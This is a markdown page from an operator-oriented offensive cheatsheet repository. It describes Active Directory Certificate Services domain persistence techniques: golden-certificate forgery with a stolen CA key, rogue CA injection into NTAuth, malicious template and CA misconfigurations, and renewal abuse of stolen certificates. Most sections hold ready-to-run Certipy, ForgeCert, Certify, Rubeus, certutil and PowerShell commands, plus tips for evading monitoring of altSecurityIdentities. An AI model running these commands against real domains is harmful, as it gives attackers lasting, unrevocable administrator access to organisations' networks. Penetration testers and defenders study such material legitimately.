daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

domain-persistence.md (12842B)


      1 ---
      2 title: "AD CS Domain Persistence"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # AD CS Domain Persistence
     14 
     15 **This is a summary of the domain persistence techniques shared in [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Check it for further details.<sup>[[5]](#references)</sup>
     16 
     17 ## Forging Certificates with Stolen CA Certificates (Golden Certificate) - DPERSIST1
     18 
     19 How can you tell that a certificate is a CA certificate?
     20 
     21 It can be determined that a certificate is a CA certificate if several conditions are met:<sup>[[5]](#references)</sup>
     22 
     23 - The certificate is stored on the CA server, with its private key secured by the machine's DPAPI, or by hardware such as a TPM/HSM if the operating system supports it.
     24 - Both the Issuer and Subject fields of the certificate match the distinguished name of the CA.
     25 - A "CA Version" extension is present in the CA certificates exclusively.
     26 - The certificate lacks Extended Key Usage (EKU) fields.
     27 
     28 To extract the private key of this certificate, the `certsrv.msc` tool on the CA server is the supported method via the built-in GUI. Nonetheless, this certificate does not differ from others stored within the system; thus, methods such as the [THEFT2 technique](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft#user-certificate-theft-via-dpapi-theft2) can be applied for extraction.
     29 
     30 The certificate and private key can also be obtained using Certipy with the following command:<sup>[[2]](#references)</sup>
     31 
     32 ```bash
     33 certipy ca 'corp.local/administrator@ca.corp.local' -hashes :123123.. -backup
     34 ```
     35 
     36 Upon acquiring the CA certificate and its private key in `.pfx` format, tools like [ForgeCert](https://github.com/GhostPack/ForgeCert) can be utilized to generate valid certificates:
     37 
     38 ```bash
     39 # Generating a new certificate with ForgeCert
     40 ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123! --Subject "CN=User" --SubjectAltName localadmin@theshire.local --NewCertPath localadmin.pfx --NewCertPassword Password123!
     41 
     42 # Generating a new certificate with certipy
     43 certipy forge -ca-pfx CORP-DC-CA.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=CORP,DC=LOCAL'
     44 
     45 # Authenticating using the new certificate with Rubeus
     46 Rubeus.exe asktgt /user:localdomain /certificate:C:\ForgeCert\localadmin.pfx /password:Password123!
     47 
     48 # Authenticating using the new certificate with certipy
     49 certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
     50 ```
     51 
     52 > [!WARNING]
     53 > The user targeted for certificate forgery must be active and capable of authenticating in Active Directory for the process to succeed. Forging a certificate for special accounts like krbtgt is ineffective.
     54 
     55 This forged certificate will be **valid** until the end date specified and as **long as the root CA certificate is valid** (usually from 5 to **10+ years**). It's also valid for **machines**, so combined with **S4U2Self**, an attacker can **maintain persistence on any domain machine** for as long as the CA certificate is valid.\
     56 Moreover, the **certificates generated** with this method **cannot be revoked** as CA is not aware of them.
     57 
     58 ### Operating under Strong Certificate Mapping Enforcement (2025+)
     59 
     60 Since February 11, 2025 (after KB5014754 rollout), domain controllers default to **Full Enforcement** for certificate mappings. Practically this means your forged certificates must either:
     61 
     62 - Contain a strong binding to the target account (for example, the SID security extension), or
     63 - Be paired with a strong, explicit mapping on the target object’s `altSecurityIdentities` attribute.<sup>[[1]](#references)</sup>
     64 
     65 A reliable approach for persistence is to mint a forged certificate chained to the stolen Enterprise CA and then add a strong explicit mapping to the victim principal:
     66 
     67 ```powershell
     68 # Example: map a forged cert to a target account using Issuer+Serial (strong mapping)
     69 $Issuer  = 'DC=corp,DC=local,CN=CORP-DC-CA'           # reverse DN format expected by AD
     70 $SerialR = '1200000000AC11000000002B'                  # serial in reversed byte order
     71 $Map     = "X509:<I>$Issuer<SR>$SerialR"             # strong mapping format
     72 Set-ADUser -Identity 'victim' -Add @{altSecurityIdentities=$Map}
     73 ```
     74 
     75 Notes
     76 - If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See [account-persistence](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/account-persistence) for more on explicit mappings.
     77 - Revocation does not help defenders here: forged certificates are unknown to the CA database and thus cannot be revoked.
     78 
     79 #### Full-Enforcement compatible forging (SID-aware)
     80 
     81 Updated tooling lets you embed the SID directly, keeping golden certificates usable even when DCs reject weak mappings:<sup>[[3]](#references)</sup>
     82 
     83 ```bash
     84 # Certify 2.0 integrates ForgeCert and can embed SID
     85 Certify.exe forge --ca-pfx CORP-DC-CA.pfx --ca-pass Password123! \
     86   --upn administrator@corp.local --sid S-1-5-21-1111111111-2222222222-3333333333-500 \
     87   --outfile administrator_sid.pfx
     88 
     89 # Certipy also supports SID in forged certs
     90 certipy forge -ca-pfx CORP-DC-CA.pfx -upn administrator@corp.local \
     91   -sid S-1-5-21-1111111111-2222222222-3333333333-500 -out administrator_sid.pfx
     92 ```
     93 
     94 By embedding the SID you avoid having to touch `altSecurityIdentities`, which may be monitored, while still satisfying strong mapping checks.
     95 
     96 ## Trusting Rogue CA Certificates - DPERSIST2
     97 
     98 The `NTAuthCertificates` object is defined to contain one or more **CA certificates** within its `cacertificate` attribute, which Active Directory (AD) utilizes. The verification process by the **domain controller** involves checking the `NTAuthCertificates` object for an entry matching the **CA specified** in the Issuer field of the authenticating **certificate**. Authentication proceeds if a match is found.<sup>[[5]](#references)</sup>
     99 
    100 A self-signed CA certificate can be added to the `NTAuthCertificates` object by an attacker, provided they have control over this AD object. Normally, only members of the **Enterprise Admin** group, along with **Domain Admins** or **Administrators** in the **forest root’s domain**, are granted permission to modify this object. They can edit the `NTAuthCertificates` object using `certutil.exe` with the command `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA`, or by employing the [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
    101 
    102 Additional helpful commands for this technique:
    103 
    104 ```bash
    105 # Add/remove and inspect the Enterprise NTAuth store
    106 certutil -enterprise -f -AddStore NTAuth C:\Temp\CERT.crt
    107 certutil -enterprise -viewstore NTAuth
    108 certutil -enterprise -delstore NTAuth <Thumbprint>
    109 
    110 # (Optional) publish into AD CA containers to improve chain building across the forest
    111 certutil -dspublish -f C:\Temp\CERT.crt RootCA          # CN=Certification Authorities
    112 certutil -dspublish -f C:\Temp\CERT.crt CA               # CN=AIA
    113 ```
    114 
    115 This capability is especially relevant when used in conjunction with a previously outlined method involving ForgeCert to dynamically generate certificates.
    116 
    117 > Post-2025 mapping considerations: placing a rogue CA in NTAuth only establishes trust in the issuing CA. To use leaf certificates for logon when DCs are in **Full Enforcement**, the leaf must either contain the SID security extension or there must be a strong explicit mapping on the target object (for example, Issuer+Serial in `altSecurityIdentities`). See {{#ref}}account-persistence.md{{#endref}}.
    118 
    119 ## Malicious Misconfiguration - DPERSIST3
    120 
    121 Opportunities for **persistence** through **security descriptor modifications of AD CS** components are plentiful. Modifications described in the "[Domain Escalation](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation)" section can be maliciously implemented by an attacker with elevated access. This includes the addition of "control rights" (e.g., WriteOwner/WriteDACL/etc.) to sensitive components such as:<sup>[[5]](#references)</sup>
    122 
    123 - The **CA server’s AD computer** object
    124 - The **CA server’s RPC/DCOM server**
    125 - Any **descendant AD object or container** in **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (for instance, the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)
    126 - **AD groups delegated rights to control AD CS** by default or by the organization (such as the built-in Cert Publishers group and any of its members)
    127 
    128 An example of malicious implementation would involve an attacker, who has **elevated permissions** in the domain, adding the **`WriteOwner`** permission to the default **`User`** certificate template, with the attacker being the principal for the right. To exploit this, the attacker would first change the ownership of the **`User`** template to themselves. Following this, the **`mspki-certificate-name-flag`** would be set to **1** on the template to enable **`ENROLLEE_SUPPLIES_SUBJECT`**, allowing a user to provide a Subject Alternative Name in the request. Subsequently, the attacker could **enroll** using the **template**, choosing a **domain administrator** name as an alternative name, and utilize the acquired certificate for authentication as the DA.
    129 
    130 Practical knobs attackers may set for long-term domain persistence (see {{#ref}}domain-escalation.md{{#endref}} for full details and detection):
    131 
    132 - CA policy flags that allow SAN from requesters (e.g., enabling `EDITF_ATTRIBUTESUBJECTALTNAME2`). This keeps ESC1-like paths exploitable.
    133 - Template DACL or settings that allow authentication-capable issuance (e.g., adding Client Authentication EKU, enabling `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`).
    134 - Controlling the `NTAuthCertificates` object or the CA containers to continuously re-introduce rogue issuers if defenders attempt cleanup.
    135 
    136 > [!TIP]
    137 > In hardened environments after KB5014754, pairing these misconfigurations with explicit strong mappings (`altSecurityIdentities`) ensures your issued or forged certificates remain usable even when DCs enforce strong mapping.
    138 
    139 ### Certificate renewal abuse (ESC14) for persistence
    140 
    141 If you compromise an authentication-capable certificate (or an Enrollment Agent one), you can **renew it indefinitely** as long as the issuing template remains published and your CA still trusts the issuer chain. Renewal keeps the original identity bindings but extends validity, making eviction difficult unless the template is fixed or the CA is republished.<sup>[[4]](#references)</sup>
    142 
    143 ```bash
    144 # Renew a stolen user cert to extend validity
    145 certipy req -ca CORP-DC-CA -template User -pfx stolen_user.pfx -renew -out user_renewed_2026.pfx
    146 
    147 # Renew an on-behalf-of cert issued via an Enrollment Agent
    148 certipy req -ca CORP-DC-CA -on-behalf-of 'CORP/victim' -pfx agent.pfx -renew -out victim_renewed.pfx
    149 ```
    150 
    151 If domain controllers are in **Full Enforcement**, add `-sid <victim SID>` (or use a template that still includes the SID security extension) so the renewed leaf certificate continues to map strongly without touching `altSecurityIdentities`. Attackers with CA admin rights may also tweak `policy\RenewalValidityPeriodUnits` to lengthen renewed lifetimes before issuing themselves a cert.<sup>[[2]](#references)[[4]](#references)</sup>
    152 
    153 
    154 ## References
    155 
    156 - [1] [Microsoft KB5014754 – Certificate-based authentication changes on Windows domain controllers (enforcement timeline and strong mappings)](https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16)
    157 - [2] [Certipy – Command Reference and forge/auth usage](https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference)
    158 - [3] [SpecterOps – Certify 2.0 (integrated forge with SID support)](https://specterops.io/blog/2025/08/11/certify-2-0/)
    159 - [4] [ESC14 renewal abuse overview](https://www.adcs-security.com/attacks/esc14)
    160 - [5] [SpecterOps – Certified Pre-Owned: Abusing Active Directory Certificate Services](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)